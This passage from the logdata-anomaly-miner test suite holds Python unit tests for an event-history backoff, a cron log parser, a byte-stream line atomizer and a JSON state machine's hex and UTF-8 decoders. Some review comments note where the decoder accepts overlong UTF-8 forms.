log_atom.get_parser_match(), self) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self) volatile_logarithmic_backoff_event_history.receive_event(self.test % self.__class__.__name__, message, [ log_atom.raw_data, log_atom.raw_data], None, 
log_atom.get_parser_match(), self) history = volatile_logarithmic_backoff_event_history.get_history() if history == [(0, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), (4, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: first += 1 elif history == [(1, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), (4, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: second += 1 elif history == [(2, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), (4, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: third += 1 elif history == [(3, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self), (4, self.test % self.__class__.__name__, message, [log_atom.raw_data, log_atom.raw_data], None, log_atom.get_parser_match(), self)]: fourth += 1 val = 0.5 * 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= first <= maximum, msg % ("first", first, minimum, maximum)) val = 0.5 * 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= second <= maximum, msg % ("second", second, minimum, maximum)) val = 2 * 0.5 * 0.5 * 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= third <= maximum, msg % ("third", third, minimum, maximum)) val = 0.5 minimum = size * val * (1 - deviation) maximum = size * val * (1 + deviation) self.assertTrue(minimum <= fourth <= maximum, msg % ("fourth", 
fourth, minimum, maximum)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/events/__init__.py000066400000000000000000000000001437606560100253670ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/generic/000077500000000000000000000000001437606560100234005ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/generic/CronParsingModelTest.py000066400000000000000000000201731437606560100300230ustar00rootroot00000000000000# skipcq: FLK-D208 """package not used. import unittest from aminer.generic import CronParsingModel from aminer.parsing.MatchContext import MatchContext from unit.TestBase import TestBase ''' These testcases are testing the CronParsingModel with the Basis Path Testing method. The Modified Condition / Decisision Coverage is also accomplished, because the conditions are all simple, which means it is tested if the path is reached. The used paths can be seen in the provided flowchart. The child elements of the CronParsingModel could be tested, but they are assumed to be working as intended, because there should be individual test cases for every parser model. 
''' class CronParsingModelTest(TestBase): ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 ''' def test1(self): self.matchContext = MatchContext(b'CRON[25537]: (root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: (root) CMD ping 8.8.8.8', self.cronParsingModel.getMatchElement('stdExec', self.matchContext).getMatchString()) ''' 1 -> 18 -> 33 ''' def test2(self): self.matchContext = MatchContext(b'systemd[1]: Started Daily apt download activities.') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 19 -> 33 ''' def test3(self): self.matchContext = MatchContext(b'CRON[ 25537 ]: (root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 3 -> 20 -> 33 ''' def test4(self): self.matchContext = MatchContext(b'CRON[25537]:(root) CMD ping 8.8.8.8') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdExec', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 16 -> 17 ''' def test5(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)', self.cronParsingModel.getMatchElement('stdPam', self.matchContext).getMatchString()) self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session closed for user root') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: pam_unix(cron:session): session closed for user root', self.cronParsingModel.getMatchElement('stdPam', self.matchContext).getMatchString()) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 21 -> 33 ''' def test6(self): 
self.matchContext = MatchContext(b'CRON[25537]: CRON info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 10 -> 21 -> 33 ''' def test7(self): self.matchContext = MatchContext(b'CRON[25537]: (CRON;) info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 11 -> 21 -> 33 ''' def test8(self): self.matchContext = MatchContext(b'CRON[25537]: (CRON) info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 12 -> 21 -> 33 ''' def test9(self): self.matchContext = MatchContext(b'CRON[25537]: (root) CMD ') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 22 -> 33 ''' def test10(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session changed for user root by (uid=0)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 23 -> 33 ''' def test11(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for root') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 24 -> 33 ''' def test12(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user /usr/root') self.cronParsingModel = 
CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 16 -> 25 -> 33 Should this case return a MatchElement? It could be an anomaly if a session is opened by another user than root. ''' def test13(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user user by (uid=2)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 31 -> 32 ''' def test14(self): self.matchContext = MatchContext(b'cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)', self.cronParsingModel.getMatchElement('low', self.matchContext).getMatchString()) ''' 1 -> 18 -> 26 -> 34 ''' def test15(self): self.matchContext = MatchContext(b'cron[ 25537 ]: (*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 35 ''' def test16(self): self.matchContext = MatchContext(b'cron[25537]:(*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 36 The DelimitedDataModelElement should only return a MatchElement if at least one byte is between the start and the delimeter. 
''' def test17(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 37 ''' def test18(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD /var/spool/cron/mailman') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 38 ''' def test19(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD ()') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 31 -> 39 ''' def test20(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD (/var/spool/cron/mailman') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) if __name__ == "__main__": unittest.main() """ logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/generic/__init__.py000066400000000000000000000000001437606560100254770ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/000077500000000000000000000000001437606560100231235ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/ByteStreamLineAtomizerTest.py000066400000000000000000000207531437606560100307460ustar00rootroot00000000000000import unittest from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer from aminer.parsing.MatchContext import MatchContext from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement import sys from unit.TestBase import TestBase class ByteStreamLineAtomizerTest(TestBase): """Unittests for the ByteStreamLineAtomizer.""" 
# Fixtures shared by the ByteStreamLineAtomizer tests (members of
# ByteStreamLineAtomizerTest, whose class header sits on the previous chunk line).
# illegal_access2 is the str form of the same line plus the two trailing newlines the
# stream printer emits after a reported line (see the expected outputs below).
illegal_access1 = b'WARNING: All illegal access operations will be denied in a future release'
illegal_access2 = 'WARNING: All illegal access operations will be denied in a future release\n\n'

def test1normal_line(self):
    """A normal line is tested as Input of the Class.

    A newline-terminated line shorter than the 300 byte limit must be consumed
    completely: consume_data() returns the number of bytes it ate.
    """
    any_dme = AnyByteDataModelElement('s')
    # 4th positional argument is the max line length (cf. test7's docstring); the meaning
    # of the two empty lists is not visible in this file.
    byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 300, [])
    data = self.illegal_access1 + b'\n'
    self.assertEqual(byte_stream_line_atomizer.consume_data(data, False), len(data))

def test2normal_complete_overlong_line(self):
    """A complete, overlong line is tested as Input of the Class.

    The atomizer must report 'Overlong line detected' through the stream printer
    handler and still consume a positive number of bytes.
    """
    match_context_fixed_dme = MatchContext(self.illegal_access1)
    any_dme = AnyByteDataModelElement('s')
    # Result deliberately unused (leading underscore); the call is kept for its effect
    # on match_context_fixed_dme.
    _match_element_fixed_dme = any_dme.get_match_element("match1", match_context_fixed_dme)
    # NOTE(review): sys.getsizeof() measures the CPython object (header + payload), not
    # the line length, and get_match_element() above may already have advanced
    # match_data -- so the limit passed here is not "one byte below the line". If that
    # is the intent, `len(self.illegal_access1) - 1` says so directly. Confirm against
    # ByteStreamLineAtomizer before changing: the expected message below relies on the
    # limit actually being exceeded.
    byte_stream_line_atomizer = ByteStreamLineAtomizer(
        any_dme, [], [self.stream_printer_event_handler], sys.getsizeof(match_context_fixed_dme.match_data) - 1, [])
    self.assertGreater(
        byte_stream_line_atomizer.consume_data(self.illegal_access1 + b'\n', False), 0)
    self.assertEqual(self.output_stream.getvalue(), 'Overlong line detected (1 lines)\n %s' % self.illegal_access2)

def test3normal_incomplete_overlong_line_stream_not_ended(self):
    """A incomplete, overlong line, with the stream NOT ended, is tested as Input of the Class.

    Same limit construction as test2 (see the note there). Without a terminating
    newline and with the stream still open, the report must read
    'Start of overlong line detected'.
    """
    match_context_fixed_dme = MatchContext(self.illegal_access1)
    any_dme = AnyByteDataModelElement('s')
    _match_element_fixed_dme = any_dme.get_match_element("match1", match_context_fixed_dme)
    byte_stream_line_atomizer = ByteStreamLineAtomizer(
        any_dme, [], [self.stream_printer_event_handler], sys.getsizeof(match_context_fixed_dme.match_data) - 1, [])
    self.assertGreater(byte_stream_line_atomizer.consume_data(self.illegal_access1, False), 0)
    self.assertEqual(self.output_stream.getvalue(), 'Start of overlong line detected (1 lines)\n %s' % self.illegal_access2)

def test4normal_incomplete_overlong_line_stream_ended(self):
    """A incomplete, overlong line, with the stream ended, is tested as Input of the Class.

    Despite the name the limit here is 300 bytes, i.e. the line is NOT overlong;
    what is exercised is the end-of-stream flag (second argument True) on an
    unterminated line, reported as 'Incomplete last line'.
    """
    any_dme = AnyByteDataModelElement('s')
    byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 300, [])
    self.assertGreater(byte_stream_line_atomizer.consume_data(self.illegal_access1, True), 0)
    self.assertEqual(self.output_stream.getvalue(), 'Incomplete last line (1 lines)\n %s' % self.illegal_access2)

def test5eol_sep(self):
    """Test the eol_sep parameter.

    With eol_sep=b'\\n\\n' single newlines are ordinary bytes; everything up to and
    including the double newline is consumed, the trailing b'other line' is left
    for the next call.
    """
    searched = b'WARNING: All illegal access operations will be denied in a future release\nAnother line of data\nThe third line of ' \
        b'data.'
    any_dme = AnyByteDataModelElement('s')
    byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 300, [], eol_sep=b'\n\n')
    data = searched + b'\n\nother line'
    self.assertEqual(byte_stream_line_atomizer.consume_data(data, False), len(data)-len(b'other line'))

def test6json_format(self):
    """Check if json formatted log data can be processed with the json_format flag.

    In json_format mode an atom is a complete JSON object, which may span several
    physical lines. The return values pin down how much of the buffer is consumed
    in each situation; the inline comments explain the individual cases.
    """
    json_data = b'{\n\t"a": 1,\n\t"b": {"x": 2}}'
    data = b'some log line.'
    any_dme = AnyByteDataModelElement('s')
    byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 300, [], json_format=True)
    # a complete object followed by junk: only the object is consumed.
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data + data, False), len(json_data))
    # this is no valid json and should process only data until the last \n
    self.assertEqual(byte_stream_line_atomizer.consume_data(data + json_data + data, False), len(data) + json_data.rfind(b'\n') + 1)
    json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, "d": 3}'
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, False), len(json_data))
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data + data, False), len(json_data))
    # two objects back to back without a separating newline.
    json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}{\n"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}'
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data + data, False), len(json_data))
    self.assertEqual(byte_stream_line_atomizer.consume_data(data + json_data, False), len(data) + json_data.rfind(b'\n') + 1)
    # even when the first json data gets invalidated, the second one starts after an empty line and is therefore valid until the end.
    json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}\n\n{\n"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}'
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data + data, False), len(json_data))
    self.assertEqual(byte_stream_line_atomizer.consume_data(data + json_data + data, False), len(data) + len(json_data))
    # this is an incomplete json, but it still can be valid.
    json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, "d'
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, False), json_data.rfind(b'\n') + 1)
    # this is an incomplete json and the end can not be valid.
    json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, d'
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, False), json_data.rfind(b'\n') + 1)

def test7json_max_line_length(self):
    """Check if json data is not parsed over the max_line_length.

    NOTE(review): with a 25 byte limit the multi-line json_data (each object well
    over 25 bytes, but no physical line longer than 25) produces no overlong
    report, while the ~60 byte single_line_json_data does. This is consistent with
    max_line_length being applied per physical line rather than per JSON object;
    if so, an object spread over many short lines is not bounded by it at all.
    Worth confirming, since this limit is the memory bound for unterminated input.
    """
    json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}\n{\n"a": 1,\n\t"b": {"c": 2},"d": 3}\n'
    single_line_json_data = b'{"a": 1,"b": {"c": 2},"d": 3}{"a": 1,"b": {"c": 2},"d": 3'
    any_dme = AnyByteDataModelElement('s')
    byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 25, [], json_format=True)
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, False), json_data.rfind(b'\n') + 1)
    self.assertEqual(self.output_stream.getvalue(), '')
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, True), len(json_data))
    self.assertEqual(self.output_stream.getvalue(), '')
    byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 100, [], json_format=True)
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, False), len(json_data))
    self.assertEqual(self.output_stream.getvalue(), '')
    self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, True), len(json_data))
    self.assertEqual(self.output_stream.getvalue(), '')
    byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 25, [], json_format=True)
    # single physical line longer than the limit, stream ended: reported as overlong.
    self.assertEqual(byte_stream_line_atomizer.consume_data(single_line_json_data, True), len(single_line_json_data))
    self.assertEqual(self.output_stream.getvalue(), 'Overlong line terminated by end of stream (1 lines)\n {"a": 1,"b": {"c": 2},"d":'
                     ' 3}{"a": 1,"b": {"c": 2},"d": 3\n\n')
    self.reset_output_stream()
    self.assertEqual(byte_stream_line_atomizer.consume_data(single_line_json_data, False), len(single_line_json_data))
    self.assertEqual(self.output_stream.getvalue(), '')
    # The remainder of test7 (a 100 byte atomizer fed single_line_json_data) is on the
    # next chunk line.
    byte_stream_line_atomizer =
ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 100, [], json_format=True) self.assertEqual(byte_stream_line_atomizer.consume_data(single_line_json_data, True), len(single_line_json_data)) self.assertEqual(self.output_stream.getvalue(), 'Incomplete last line (1 lines)\n {"a": 1,"b": {"c": 2},"d": 3\n\n') self.reset_output_stream() self.assertEqual(byte_stream_line_atomizer.consume_data(single_line_json_data, False), len( single_line_json_data.rsplit(b'}', 2)[0]) + 1) self.assertEqual(self.output_stream.getvalue(), '') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/JsonStateMachineTest.py000066400000000000000000000703061437606560100275420ustar00rootroot00000000000000import unittest from aminer.input.JsonStateMachine import json_machine, constant_machine, string_machine, utf8_machine, hex_machine, number_machine,\ array_machine, object_machine from unit.TestBase import TestBase class ByteStreamLineAtomizerTest(TestBase): """Unittests for the JsonStateMachine.""" def test1hex_machine_valid_values(self): """Test the hex_machine with all valid four digit values from 0x0000 to 0xFFFF.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, i) for i in range(65536): string = str(format(i, '#06x')).encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) for i in range(65536): string = str(format(i, '#06x')).upper().encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) def test2hex_machine_too_short_value(self): """Test the hex_machine with too short hex values.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, i) for i in range(4096): # converts the integer to the shortest possible hex string. 
# Continuation of test2hex_machine_too_short_value: its def, check_value helper and
# the outer `for i in range(4096):` loop are on the previous chunk line. Inside the
# loop nothing is asserted -- feeding fewer than four hex digits must merely not raise
# (if check_value were invoked it would compare the value against i).
string = str(hex(i)).encode()[2:]  # remove 0x
state = hex_machine(check_value)
for c in string:
    state = state(c)
# 4096 == 0x1000 is the first value with exactly four digits: the machine completes
# and returns None.
i = 4096
string = str(hex(i)).encode()[2:]  # remove 0x
state = hex_machine(check_value)
for c in string:
    state = state(c)
self.assertIsNone(state)

def test3hex_machine_too_long_value(self):
    """Test the hex_machine with too long hex values. All values longer than 4 digits are stripped.

    The machine returns None after the fourth digit (enumerate index 3) and
    reports only those four digits; the surplus input is left to the caller.
    """
    def check_value(data):  # skipcq: PY-D0003
        self.assertEqual(data, i)  # i is read at call time (late binding)
    # only 00FF is read.
    i = 255
    string = b'0x00FFFF'[2:]  # remove 0x
    state = hex_machine(check_value)
    j = 0
    for j, c in enumerate(string):
        state = state(c)
        if state is None:
            break
    self.assertEqual(j, 3)
    self.assertIsNone(state)
    # only 0F12 is read.
    i = 3858
    string = b'0x0F1234'[2:]  # remove 0x
    state = hex_machine(check_value)
    j = 0
    for j, c in enumerate(string):
        state = state(c)
        if state is None:
            break
    self.assertEqual(j, 3)
    self.assertIsNone(state)

def test4hex_machine_boundary_values(self):
    """Test boundary values before and after 0-9, a-f, A-F.

    forbidden_value_list is every 7-bit code outside '0'-'9' (48-57), 'A'-'F'
    (65-70) and 'a'-'f' (97-102); each must end the machine (None) on the very
    first byte. Bytes >= 0x80 are not covered here.
    """
    def check_value(data):  # skipcq: PY-D0003
        self.assertEqual(data, i)
    allowed_value_list = '0123456789abcdefABCDEF'
    # int(hex(j), 16) is just j; the list is the four gaps around the allowed ranges.
    forbidden_value_list = [int(hex(j), 16) for j in range(48)] + [int(hex(j), 16) for j in range(58, 65)] + [
        int(hex(j), 16) for j in range(71, 97)] + [int(hex(j), 16) for j in range(103, 128)]
    for a in allowed_value_list:
        state = hex_machine(check_value)
        string = '0x'+a+a+a+a
        i = int(string, 16)  # convert hex string to integer
        for _ in range(4):
            state = state(ord(a))
        self.assertEqual(state, None)
    for f in forbidden_value_list:
        state = hex_machine(check_value)
        self.assertIsNone(state(f), "value: %d, char: '%s' should not be allowed in the hex_machine!"
                          % (f, chr(f)))

def test5hex_machine_started_from_string_machine(self):
    """Test if the hex_machine is started from the string_machine.

    In a bytes literal `\\u02FF` is NOT a unicode escape: it is the six ASCII bytes
    backslash, 'u', '0', '2', 'F', 'F' -- exactly the JSON \\uXXXX escape the
    string_machine must hand to hex_machine (state name '_hex'). The skipcq
    marker silences the anomalous-escape lint for that reason.
    """
    def check_value(_data):  # skipcq: PY-D0003, PTC-W0049
        pass
    string = b"\u02FF"  # skipcq: PYL-W1402
    state = string_machine(check_value)
    hex_machine_found = False
    for c in string:
        state = state(c)
        if state.__name__ == '_hex':
            hex_machine_found = True
    self.assertIsNone(state(ord(b'"')))
    self.assertTrue(hex_machine_found)
    string = b"\uff02"  # skipcq: PYL-W1402
    state = string_machine(check_value)
    hex_machine_found = False
    for c in string:
        state = state(c)
        if state.__name__ == '_hex':
            hex_machine_found = True
    self.assertIsNone(state(ord(b'"')))
    self.assertTrue(hex_machine_found)

def test6utf8_machine_allowed_2_byte_values(self):
    """
    Test all allowed values for the utf8_machine with 2 byte values.
    Only every 4th value is checked to save time. This can be changed by changing the step variable.
    When checking every 4th value the boundary values are also checked.

    NOTE(review): the "allowed" lead-byte range starts at 0xC0 (192), so the
    decoder accepts overlong two-byte forms such as C0 80 (-> 0) or C0 AF
    (-> '/'). RFC 3629 forbids lead bytes 0xC0/0xC1 precisely because overlong
    encodings are a classic way to smuggle characters past byte-level filters;
    a strict decoder returns None for them. Tightening utf8_machine would
    require updating this test and test7.
    """
    def check_value_hex2(data):  # skipcq: PY-D0003
        # expected code point ((i & 0x1F) << 6) | (j & 0x3F), written additively;
        # i and j are bound late from the loops below.
        self.assertEqual(data, (i - 194)*64 + j)
    step = 4
    for i in range(192, 224):
        for j in range(128, 192, step):
            state = utf8_machine(i, check_value_hex2)
            state = state(j)
    # check if the state is None only once to save time.
    self.assertIsNone(state)

def test7utf8_machine_forbidden_2_byte_boundary_values(self):
    """Test all boundary values for 2 byte utf8 values.

    A lead byte below 0xC0, or a second byte outside 0x80-0xBF, must end the
    machine (None). The two assertRaises lines show that C0 80 and C0 BF ARE
    decoded (raise_error is the success callback) -- see the note on test6.
    """
    def raise_error(_):  # skipcq: PY-D0003
        raise Exception("Valid UTF-8 value found in boundary test!")
    self.assertIsNone(utf8_machine(191, raise_error))
    self.assertIsNone(utf8_machine(192, raise_error)(127))
    self.assertIsNone(utf8_machine(192, raise_error)(192))
    self.assertRaises(Exception, utf8_machine(192, raise_error), 128)
    self.assertRaises(Exception, utf8_machine(192, raise_error), 191)

def test8utf8_machine_allowed_3_byte_values(self):
    """
    Test all allowed values for the utf8_machine with 3 byte values. Only every 4th value is checked to save time.
    This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked.

    NOTE(review): as in test6 the ranges are purely structural: E0 80..9F xx
    (overlong) and ED A0..BF xx (UTF-16 surrogates U+D800-U+DFFF) are both
    inside the "allowed" set. A strict decoder rejects both.
    """
    def check_value_hex3(data):  # skipcq: PY-D0003
        # ((i & 0x0F) << 12) | ((j & 0x3F) << 6) | (k & 0x3F), written additively.
        self.assertEqual(data, (i - 224)*64*64 + (j - 128)*64 + k - 128)
    step = 4
    for i in range(224, 240):
        for j in range(128, 192, step):
            for k in range(128, 192):
                state = utf8_machine(i, check_value_hex3)
                state = state(j)
                state = state(k)
    # check if the state is None only once to save time.
    self.assertIsNone(state)

def test9utf8_machine_forbidden_3_byte_boundary_values(self):
    """Test all boundary values for 3 byte utf8 values.

    Bytes outside 0x80-0xBF in second or third position end the machine. The
    assertRaises lines show E0 80 80 (overlong NUL) is decoded -- see test8.
    """
    def raise_error(_):  # skipcq: PY-D0003
        raise Exception("Valid UTF-8 value found in boundary test!")
    self.assertIsNone(utf8_machine(224, raise_error)(127))
    self.assertIsNone(utf8_machine(224, raise_error)(192))
    self.assertIsNone(utf8_machine(224, raise_error)(128)(127))
    self.assertIsNone(utf8_machine(224, raise_error)(191)(192))
    self.assertRaises(Exception, utf8_machine(224, raise_error)(128), 128)
    self.assertRaises(Exception, utf8_machine(224, raise_error)(191), 191)

def test10utf8_machine_allowed_4_byte_values(self):
    """
    Test all allowed values for the utf8_machine with 4 byte values. Only every 4th value is checked to save time.
    This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked.

    NOTE(review): the lead-byte range 0xF0-0xF7 includes F5-F7, which encode
    code points above U+10FFFF, and F0 80..8F xx xx is overlong; F4 90+ is out
    of range as well. None of these are valid UTF-8 under RFC 3629.
    """
    def check_value_hex4(data):  # skipcq: PY-D0003
        # ((i & 0x07) << 18) | ((j & 0x3F) << 12) | ((k & 0x3F) << 6) | (m & 0x3F).
        self.assertEqual(data, (i - 240)*64*64*64 + (j - 128)*64*64 + (k - 128)*64 + m - 128)
    step = 4
    for i in range(240, 248):
        for j in range(128, 192, step):
            for k in range(128, 192, step):
                for m in range(128, 192, step):
                    state = utf8_machine(i, check_value_hex4)
                    state = state(j)
                    state = state(k)
                    state = state(m)
    # check if the state is None only once to save time.
    self.assertIsNone(state)

def test11utf8_machine_forbidden_3_byte_boundary_values(self):
    """Test all boundary values for 4 byte utf8 values.

    (The method name says 3_byte; it covers the 4 byte case, as the docstring
    says.) Continuation bytes outside 0x80-0xBF in any position end the machine;
    the assertRaises lines show F0 80 80 80 (overlong) is decoded -- see test10.
    """
    def raise_error(_):  # skipcq: PY-D0003
        raise Exception("Valid UTF-8 value found in boundary test!")
    self.assertIsNone(utf8_machine(240, raise_error)(127))
    self.assertIsNone(utf8_machine(240, raise_error)(192))
    self.assertIsNone(utf8_machine(240, raise_error)(128)(127))
    self.assertIsNone(utf8_machine(240, raise_error)(191)(192))
    self.assertIsNone(utf8_machine(240, raise_error)(128)(128)(127))
    self.assertIsNone(utf8_machine(240, raise_error)(191)(191)(192))
    self.assertRaises(Exception, utf8_machine(240, raise_error)(128)(128), 128)
    self.assertRaises(Exception, utf8_machine(240, raise_error)(191)(191), 191)

def test12utf8_machine_started_from_string_machine(self):
    """Test if the utf8_machine is started from the string_machine.

    \\x5f is plain ASCII '_' and must not start the sub-machine; the 2-, 3- and
    4-byte samples (C2 B0, E0 A0 AB, F0 93 80 90) are shortest-form encodings and
    must hand control to the state named '_utf8'. The closing quote is fed after
    the loop; its None result proves the string terminated normally.
    """
    def check_value(_data):  # skipcq: PY-D0003, PTC-W0049
        pass
    string = b"File pattern: file\x5f.txt"
    state = string_machine(check_value)
    utf8_machine_found = False
    for c in string:
        state = state(c)
        if state.__name__ == '_utf8':
            utf8_machine_found = True
    self.assertIsNone(state(ord(b'"')))
    self.assertFalse(utf8_machine_found)
    string = b"It is 20\xc2\xb0C"
    state = string_machine(check_value)
    utf8_machine_found = False
    for c in string:
        state = state(c)
        if state.__name__ == '_utf8':
            utf8_machine_found = True
    self.assertIsNone(state(ord(b'"')))
    self.assertTrue(utf8_machine_found)
